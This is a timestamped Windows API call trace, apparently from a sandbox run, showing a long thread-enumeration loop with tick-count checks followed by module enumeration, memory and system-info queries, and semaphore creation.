	[0097.987] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.988] GetTickCount () returned 0x2c0f4
	[0097.988] GetCurrentThreadId () returned 0xc24
	[0097.988] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.989] GetTickCount () returned 0x2c0f4
	[0097.989] GetCurrentThreadId () returned 0xc24
	[0097.989] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.990] GetTickCount () returned 0x2c0f4
	[0097.990] GetCurrentThreadId () returned 0xc24
	[0097.990] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.991] GetTickCount () returned 0x2c0f4
	[0097.991] GetCurrentThreadId () returned 0xc24
	[0097.991] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.992] GetTickCount () returned 0x2c0f4
	[0097.992] GetCurrentThreadId () returned 0xc24
	[0097.992] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.993] GetTickCount () returned 0x2c0f4
	[0097.993] GetCurrentThreadId () returned 0xc24
	[0097.993] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.994] GetTickCount () returned 0x2c0f4
	[0097.994] GetCurrentThreadId () returned 0xc24
	[0097.994] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.995] GetTickCount () returned 0x2c0f4
	[0097.995] GetCurrentThreadId () returned 0xc24
	[0097.995] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.996] GetTickCount () returned 0x2c0f4
	[0097.996] GetCurrentThreadId () returned 0xc24
	[0097.996] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.997] GetTickCount () returned 0x2c0f4
	[0097.997] GetCurrentThreadId () returned 0xc24
	[0097.997] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.998] GetTickCount () returned 0x2c104
	[0097.998] GetCurrentThreadId () returned 0xc24
	[0097.998] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0097.999] GetTickCount () returned 0x2c104
	[0097.999] GetCurrentThreadId () returned 0xc24
	[0097.999] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.001] GetTickCount () returned 0x2c104
	[0098.001] GetCurrentThreadId () returned 0xc24
	[0098.001] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.002] GetTickCount () returned 0x2c104
	[0098.002] GetCurrentThreadId () returned 0xc24
	[0098.002] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.003] GetTickCount () returned 0x2c104
	[0098.003] GetCurrentThreadId () returned 0xc24
	[0098.003] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.004] GetTickCount () returned 0x2c104
	[0098.004] GetCurrentThreadId () returned 0xc24
	[0098.004] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.006] GetTickCount () returned 0x2c104
	[0098.006] GetCurrentThreadId () returned 0xc24
	[0098.006] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.007] GetTickCount () returned 0x2c104
	[0098.007] GetCurrentThreadId () returned 0xc24
	[0098.007] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.008] GetTickCount () returned 0x2c104
	[0098.008] GetCurrentThreadId () returned 0xc24
	[0098.008] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.009] GetTickCount () returned 0x2c104
	[0098.009] GetCurrentThreadId () returned 0xc24
	[0098.009] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.010] GetTickCount () returned 0x2c104
	[0098.010] GetCurrentThreadId () returned 0xc24
	[0098.010] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.011] GetTickCount () returned 0x2c104
	[0098.011] GetCurrentThreadId () returned 0xc24
	[0098.011] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.012] GetTickCount () returned 0x2c104
	[0098.012] GetCurrentThreadId () returned 0xc24
	[0098.012] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.013] GetTickCount () returned 0x2c114
	[0098.013] GetCurrentThreadId () returned 0xc24
	[0098.013] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.014] GetTickCount () returned 0x2c114
	[0098.014] GetCurrentThreadId () returned 0xc24
	[0098.014] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.015] GetTickCount () returned 0x2c114
	[0098.015] GetCurrentThreadId () returned 0xc24
	[0098.015] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.016] GetTickCount () returned 0x2c114
	[0098.016] GetCurrentThreadId () returned 0xc24
	[0098.017] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.017] GetTickCount () returned 0x2c114
	[0098.017] GetCurrentThreadId () returned 0xc24
	[0098.018] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.018] GetTickCount () returned 0x2c114
	[0098.018] GetCurrentThreadId () returned 0xc24
	[0098.019] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.094] GetTickCount () returned 0x2c162
	[0098.094] GetCurrentThreadId () returned 0xc24
	[0098.094] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.095] GetTickCount () returned 0x2c162
	[0098.095] GetCurrentThreadId () returned 0xc24
	[0098.095] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.096] GetTickCount () returned 0x2c162
	[0098.096] GetCurrentThreadId () returned 0xc24
	[0098.096] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.097] GetTickCount () returned 0x2c162
	[0098.097] GetCurrentThreadId () returned 0xc24
	[0098.097] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.098] GetTickCount () returned 0x2c162
	[0098.098] GetCurrentThreadId () returned 0xc24
	[0098.098] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.099] GetTickCount () returned 0x2c162
	[0098.099] GetCurrentThreadId () returned 0xc24
	[0098.099] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.100] GetTickCount () returned 0x2c162
	[0098.100] GetCurrentThreadId () returned 0xc24
	[0098.101] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.101] GetTickCount () returned 0x2c162
	[0098.102] GetCurrentThreadId () returned 0xc24
	[0098.102] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.103] GetTickCount () returned 0x2c162
	[0098.103] GetCurrentThreadId () returned 0xc24
	[0098.103] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.104] GetTickCount () returned 0x2c162
	[0098.104] GetCurrentThreadId () returned 0xc24
	[0098.104] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.105] GetTickCount () returned 0x2c162
	[0098.105] GetCurrentThreadId () returned 0xc24
	[0098.105] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.106] GetTickCount () returned 0x2c162
	[0098.106] GetCurrentThreadId () returned 0xc24
	[0098.106] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.107] GetTickCount () returned 0x2c162
	[0098.107] GetCurrentThreadId () returned 0xc24
	[0098.107] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.108] GetTickCount () returned 0x2c171
	[0098.108] GetCurrentThreadId () returned 0xc24
	[0098.108] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.109] GetTickCount () returned 0x2c171
	[0098.109] GetCurrentThreadId () returned 0xc24
	[0098.109] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.110] GetTickCount () returned 0x2c171
	[0098.110] GetCurrentThreadId () returned 0xc24
	[0098.110] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.111] GetTickCount () returned 0x2c171
	[0098.111] GetCurrentThreadId () returned 0xc24
	[0098.111] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.112] GetTickCount () returned 0x2c171
	[0098.112] GetCurrentThreadId () returned 0xc24
	[0098.112] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.113] GetTickCount () returned 0x2c171
	[0098.113] GetCurrentThreadId () returned 0xc24
	[0098.113] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.114] GetTickCount () returned 0x2c171
	[0098.114] GetCurrentThreadId () returned 0xc24
	[0098.114] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.115] GetTickCount () returned 0x2c171
	[0098.115] GetCurrentThreadId () returned 0xc24
	[0098.115] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.116] GetTickCount () returned 0x2c171
	[0098.116] GetCurrentThreadId () returned 0xc24
	[0098.116] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.117] GetTickCount () returned 0x2c171
	[0098.117] GetCurrentThreadId () returned 0xc24
	[0098.117] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.118] GetTickCount () returned 0x2c171
	[0098.118] GetCurrentThreadId () returned 0xc24
	[0098.118] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.119] GetTickCount () returned 0x2c171
	[0098.119] GetCurrentThreadId () returned 0xc24
	[0098.119] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.120] GetTickCount () returned 0x2c171
	[0098.120] GetCurrentThreadId () returned 0xc24
	[0098.120] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.121] GetTickCount () returned 0x2c171
	[0098.121] GetCurrentThreadId () returned 0xc24
	[0098.122] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.122] GetTickCount () returned 0x2c181
	[0098.123] GetCurrentThreadId () returned 0xc24
	[0098.123] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.123] GetTickCount () returned 0x2c181
	[0098.124] GetCurrentThreadId () returned 0xc24
	[0098.124] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.125] GetTickCount () returned 0x2c181
	[0098.125] GetCurrentThreadId () returned 0xc24
	[0098.125] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.126] GetTickCount () returned 0x2c181
	[0098.126] GetCurrentThreadId () returned 0xc24
	[0098.126] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.127] GetTickCount () returned 0x2c181
	[0098.127] GetCurrentThreadId () returned 0xc24
	[0098.127] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.261] GetTickCount () returned 0x2c1fe
	[0098.261] GetCurrentThreadId () returned 0xc24
	[0098.262] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.263] GetTickCount () returned 0x2c1fe
	[0098.263] GetCurrentThreadId () returned 0xc24
	[0098.263] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.264] GetTickCount () returned 0x2c1fe
	[0098.264] GetCurrentThreadId () returned 0xc24
	[0098.264] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.266] GetTickCount () returned 0x2c20e
	[0098.266] GetCurrentThreadId () returned 0xc24
	[0098.266] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.267] GetTickCount () returned 0x2c20e
	[0098.267] GetCurrentThreadId () returned 0xc24
	[0098.267] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.270] GetTickCount () returned 0x2c20e
	[0098.270] GetCurrentThreadId () returned 0xc24
	[0098.270] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.271] GetTickCount () returned 0x2c20e
	[0098.271] GetCurrentThreadId () returned 0xc24
	[0098.271] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.272] GetTickCount () returned 0x2c20e
	[0098.272] GetCurrentThreadId () returned 0xc24
	[0098.272] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.273] GetTickCount () returned 0x2c20e
	[0098.273] GetCurrentThreadId () returned 0xc24
	[0098.273] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.274] GetTickCount () returned 0x2c20e
	[0098.274] GetCurrentThreadId () returned 0xc24
	[0098.274] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.275] GetTickCount () returned 0x2c20e
	[0098.275] GetCurrentThreadId () returned 0xc24
	[0098.275] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.276] GetTickCount () returned 0x2c20e
	[0098.276] GetCurrentThreadId () returned 0xc24
	[0098.276] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.277] GetTickCount () returned 0x2c20e
	[0098.277] GetCurrentThreadId () returned 0xc24
	[0098.277] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.278] GetTickCount () returned 0x2c20e
	[0098.278] GetCurrentThreadId () returned 0xc24
	[0098.278] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.279] GetTickCount () returned 0x2c21d
	[0098.279] GetCurrentThreadId () returned 0xc24
	[0098.279] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.280] GetTickCount () returned 0x2c21d
	[0098.280] GetCurrentThreadId () returned 0xc24
	[0098.280] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.281] GetTickCount () returned 0x2c21d
	[0098.281] GetCurrentThreadId () returned 0xc24
	[0098.281] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.282] GetTickCount () returned 0x2c21d
	[0098.282] GetCurrentThreadId () returned 0xc24
	[0098.282] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.283] GetTickCount () returned 0x2c21d
	[0098.283] GetCurrentThreadId () returned 0xc24
	[0098.283] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.284] GetTickCount () returned 0x2c21d
	[0098.284] GetCurrentThreadId () returned 0xc24
	[0098.285] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.285] GetTickCount () returned 0x2c21d
	[0098.285] GetCurrentThreadId () returned 0xc24
	[0098.286] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.286] GetTickCount () returned 0x2c21d
	[0098.286] GetCurrentThreadId () returned 0xc24
	[0098.287] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.288] GetTickCount () returned 0x2c21d
	[0098.288] GetCurrentThreadId () returned 0xc24
	[0098.288] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.289] GetTickCount () returned 0x2c21d
	[0098.289] GetCurrentThreadId () returned 0xc24
	[0098.289] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.290] GetTickCount () returned 0x2c21d
	[0098.290] GetCurrentThreadId () returned 0xc24
	[0098.290] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.291] GetTickCount () returned 0x2c21d
	[0098.291] GetCurrentThreadId () returned 0xc24
	[0098.291] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.292] GetTickCount () returned 0x2c21d
	[0098.292] GetCurrentThreadId () returned 0xc24
	[0098.292] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.293] GetTickCount () returned 0x2c21d
	[0098.293] GetCurrentThreadId () returned 0xc24
	[0098.293] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.294] GetTickCount () returned 0x2c21d
	[0098.294] GetCurrentThreadId () returned 0xc24
	[0098.294] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.295] GetTickCount () returned 0x2c22d
	[0098.295] GetCurrentThreadId () returned 0xc24
	[0098.295] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.296] GetTickCount () returned 0x2c22d
	[0098.296] GetCurrentThreadId () returned 0xc24
	[0098.296] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.366] GetTickCount () returned 0x2c26b
	[0098.366] GetCurrentThreadId () returned 0xc24
	[0098.366] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.367] GetTickCount () returned 0x2c26b
	[0098.367] GetCurrentThreadId () returned 0xc24
	[0098.367] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.368] GetTickCount () returned 0x2c26b
	[0098.368] GetCurrentThreadId () returned 0xc24
	[0098.368] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.369] GetTickCount () returned 0x2c26b
	[0098.369] GetCurrentThreadId () returned 0xc24
	[0098.370] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.370] GetTickCount () returned 0x2c26b
	[0098.370] GetCurrentThreadId () returned 0xc24
	[0098.371] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.371] GetTickCount () returned 0x2c26b
	[0098.372] GetCurrentThreadId () returned 0xc24
	[0098.372] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.373] GetTickCount () returned 0x2c26b
	[0098.373] GetCurrentThreadId () returned 0xc24
	[0098.373] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.374] GetTickCount () returned 0x2c27b
	[0098.374] GetCurrentThreadId () returned 0xc24
	[0098.374] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.375] GetTickCount () returned 0x2c27b
	[0098.375] GetCurrentThreadId () returned 0xc24
	[0098.375] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.376] GetTickCount () returned 0x2c27b
	[0098.376] GetCurrentThreadId () returned 0xc24
	[0098.376] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.377] GetTickCount () returned 0x2c27b
	[0098.377] GetCurrentThreadId () returned 0xc24
	[0098.377] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.378] GetTickCount () returned 0x2c27b
	[0098.378] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.380] GetTickCount () returned 0x2c27b
	[0098.380] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.381] GetTickCount () returned 0x2c27b
	[0098.381] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.382] GetTickCount () returned 0x2c27b
	[0098.382] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.383] GetTickCount () returned 0x2c27b
	[0098.383] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.384] GetTickCount () returned 0x2c27b
	[0098.384] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.384] GetTickCount () returned 0x2c27b
	[0098.385] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.385] GetTickCount () returned 0x2c27b
	[0098.386] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.387] GetTickCount () returned 0x2c27b
	[0098.387] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.388] GetTickCount () returned 0x2c27b
	[0098.388] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.389] GetTickCount () returned 0x2c28b
	[0098.389] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.390] GetTickCount () returned 0x2c28b
	[0098.390] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.391] GetTickCount () returned 0x2c28b
	[0098.391] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.392] GetTickCount () returned 0x2c28b
	[0098.392] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.393] GetTickCount () returned 0x2c28b
	[0098.393] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.394] GetTickCount () returned 0x2c28b
	[0098.394] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.395] GetTickCount () returned 0x2c28b
	[0098.395] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.398] GetTickCount () returned 0x2c28b
	[0098.399] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.399] GetTickCount () returned 0x2c28b
	[0098.399] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.400] GetTickCount () returned 0x2c28b
	[0098.401] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.401] GetTickCount () returned 0x2c28b
	[0098.402] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.430] GetTickCount () returned 0x2c2aa
	[0098.430] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.431] GetTickCount () returned 0x2c2aa
	[0098.431] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.432] GetTickCount () returned 0x2c2aa
	[0098.432] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.433] GetTickCount () returned 0x2c2aa
	[0098.433] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.434] GetTickCount () returned 0x2c2aa
	[0098.434] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.435] GetTickCount () returned 0x2c2aa
	[0098.435] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.436] GetTickCount () returned 0x2c2b9
	[0098.436] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.437] GetTickCount () returned 0x2c2b9
	[0098.437] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.438] GetTickCount () returned 0x2c2b9
	[0098.438] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.439] GetTickCount () returned 0x2c2b9
	[0098.439] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.440] GetTickCount () returned 0x2c2b9
	[0098.440] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.441] GetTickCount () returned 0x2c2b9
	[0098.441] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.442] GetTickCount () returned 0x2c2b9
	[0098.442] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.443] GetTickCount () returned 0x2c2b9
	[0098.443] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.444] GetTickCount () returned 0x2c2b9
	[0098.444] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.445] GetTickCount () returned 0x2c2b9
	[0098.445] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.446] GetTickCount () returned 0x2c2b9
	[0098.446] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.447] GetTickCount () returned 0x2c2b9
	[0098.447] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.448] GetTickCount () returned 0x2c2b9
	[0098.448] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.449] GetTickCount () returned 0x2c2b9
	[0098.449] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.450] GetTickCount () returned 0x2c2b9
	[0098.450] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.451] GetTickCount () returned 0x2c2c9
	[0098.451] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.452] GetTickCount () returned 0x2c2c9
	[0098.452] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.453] GetTickCount () returned 0x2c2c9
	[0098.453] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.454] GetTickCount () returned 0x2c2c9
	[0098.454] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.455] GetTickCount () returned 0x2c2c9
	[0098.455] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.456] GetTickCount () returned 0x2c2c9
	[0098.456] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.457] GetTickCount () returned 0x2c2c9
	[0098.457] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.458] GetTickCount () returned 0x2c2c9
	[0098.458] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.459] GetTickCount () returned 0x2c2c9
	[0098.459] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.460] GetTickCount () returned 0x2c2c9
	[0098.460] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.463] GetTickCount () returned 0x2c2c9
	[0098.463] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.464] GetTickCount () returned 0x2c2c9
	[0098.464] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.465] GetTickCount () returned 0x2c2c9
	[0098.465] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.501] GetTickCount () returned 0x2c2f8
	[0098.501] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.502] GetTickCount () returned 0x2c2f8
	[0098.502] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.503] GetTickCount () returned 0x2c2f8
	[0098.503] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.503] GetTickCount () returned 0x2c2f8
	[0098.504] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.504] GetTickCount () returned 0x2c2f8
	[0098.505] Thread32Next (hSnapshot=0x408, lpte=0x20afa40) returned 1
	[0098.505] GetTickCount () returned 0x2c2f8
	[0098.506] Module32First (hSnapshot=0x408, lpme=0x20af6d0) returned 1
	[0098.507] Module32Next (hSnapshot=0x408, lpme=0x20af6d0) returned 1
	[0098.508] GetTickCount () returned 0x2c2f8
	[0098.508] CloseHandle (hObject=0x408) returned 1
	[0098.508] FreeLibrary (hLibModule=0x765a0000) returned 1
	[0098.508] QueryPerformanceCounter (in: lpPerformanceCount=0x20af638 | out: lpPerformanceCount=0x20af638*=1818101500000) returned 1
	[0098.508] GetCurrentThreadId () returned 0xc24
	[0098.508] GlobalMemoryStatus (in: lpBuffer=0x20afa20 | out: lpBuffer=0x20afa20) 
	[0098.508] GetCurrentThreadId () returned 0xc24
	[0098.509] GetCurrentProcessId () returned 0xdd4
	[0098.509] GetCurrentThreadId () returned 0xc24
	[0098.536] SetLastError (dwErrCode=0x0) 
	[0098.536] GetLastError () returned 0x0
	[0098.536] SetLastError (dwErrCode=0x0) 
	[0098.536] GetLastError () returned 0x0
	[0098.536] SetLastError (dwErrCode=0x0) 
	[0098.536] SetLastError (dwErrCode=0x0) 
	[0098.537] GetLastError () returned 0x0
	[0098.537] SetLastError (dwErrCode=0x0) 
	[0098.537] GetLastError () returned 0x0
	[0098.537] SetLastError (dwErrCode=0x0) 
	[0098.615] SetLastError (dwErrCode=0x0) 
	[0098.615] GetLastError () returned 0x0
	[0098.615] SetLastError (dwErrCode=0x0) 
	[0098.615] GetLastError () returned 0x0
	[0098.615] SetLastError (dwErrCode=0x0) 
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.616] GetLastError () returned 0x0
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.616] GetLastError () returned 0x0
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.616] GetLastError () returned 0x0
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.616] GetLastError () returned 0x0
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.616] GetLastError () returned 0x0
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.616] GetLastError () returned 0x0
	[0098.616] SetLastError (dwErrCode=0x0) 
	[0098.617] SetLastError (dwErrCode=0x0) 
	[0098.617] GetLastError () returned 0x0
	[0098.617] SetLastError (dwErrCode=0x0) 
	[0098.617] GetLastError () returned 0x0
	[0098.617] SetLastError (dwErrCode=0x0) 
	[0098.620] GetSystemInfo (in: lpSystemInfo=0x20afbac | out: lpSystemInfo=0x20afbac*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0098.620] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x290
	[0098.620] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x408
	[0098.621] SetLastError (dwErrCode=0x0) 
